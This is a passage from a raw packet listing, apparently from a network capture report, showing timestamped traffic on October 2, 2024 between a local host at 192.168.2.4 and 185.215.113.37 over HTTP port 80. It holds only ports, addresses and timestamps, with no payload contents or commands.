Oct 2, 2024 18:19:29.185317993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185327053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185343027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185365915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185374975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185386896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185399055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185429096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185625076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185640097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185655117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185672045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185682058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185688972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185714006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185731888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185740948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185779095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185823917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185902119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185920954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185939074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185949087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185954094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185971022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185986042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.185986042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.185992956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186001062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186014891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186044931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186044931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186059952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186239004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186254978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186276913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186280966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186307907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186306953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186321020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186327934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186336040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186336994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186343908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186351061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186352968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186358929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186366081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186364889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186372042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186379910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186388016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186400890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186403036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186409950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186409950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186455965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.186974049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.186990976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187015057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187019110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187030077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187032938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187053919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187057972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187076092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187079906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187088966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187092066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187098026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187103987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187109947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187113047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187122107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187129974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187131882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187134981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187139034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187158108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187166929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187181950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187191010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187196970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187211990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.187222004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187252045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.187252045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188038111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188054085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188069105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188077927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188095093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188101053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188117027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188122034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188139915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188143969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188154936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188164949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188170910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188182116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188189030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188194990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188203096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188221931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188234091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188252926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188407898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188424110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188442945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188447952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188457012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188466072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188479900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188486099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188497066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188504934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188519955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188534975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188534975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188549995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188560963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188565016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188586950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188606977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188611984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188621044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188644886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188661098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188671112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188671112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188674927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188689947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188700914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188724995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188759089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188771009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188786983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188801050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188808918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188818932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188826084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188841105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188858986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188880920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188895941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188904047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188910007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188931942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188941002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188941956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188947916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188956022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188961983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.188965082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188977957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.188990116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189007998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189018965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189033985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189038038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189059973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189060926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189080000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189102888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189119101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189121962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189136982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189141035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189152002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189157009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189167023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189173937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189188004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189205885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189522028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189538002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189553976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189563990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189578056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189589024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189594030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.189620018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.189641953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.225033998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.229846954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455645084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455679893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455696106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455718040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.455730915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.455737114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.455741882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455756903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455773115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455785990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.455790043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.455799103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.455831051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.455996037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456060886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456074953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456096888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456096888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456123114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456129074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456139088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456156015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456163883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456177950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456197977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456262112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456276894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456291914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456315994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456372023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456402063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456417084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456430912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456439972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456445932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456463099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456471920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456490993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456562996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456578016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456592083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456598997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456605911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456619024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456621885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456640005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456661940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456732035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456747055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456760883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456769943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456775904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.456798077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456823111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.456994057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457016945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457031012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457039118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457043886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457051039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457058907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457067013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457073927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457081079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457089901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457097054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457106113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457113028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457144022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457144022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457170963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457185984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457200050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457206011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457215071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457221031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457230091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457290888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457290888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457412958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457428932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457442999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457451105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457468033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457479000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457483053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457496881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457510948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457524061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457531929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457539082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457554102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457561016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457568884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457582951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.457587957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457600117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457604885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.457629919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.588726997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588740110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588749886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588759899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588790894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.588839054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.588859081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588932037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.588948011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588960886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.588992119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589013100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589030027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589040041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589049101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589056015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589067936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589085102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589103937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589210987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589221001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589231014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589240074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589251995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589281082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589385033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589412928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589422941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589458942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589468956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589550018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589561939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589570999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589581013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589593887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589607954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589632988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589812040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589823008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589831114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589842081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589852095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589859009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589880943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589880943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589920044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.589941025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589951038 CEST	80	49737	185.215.113.37	192.168.2.4
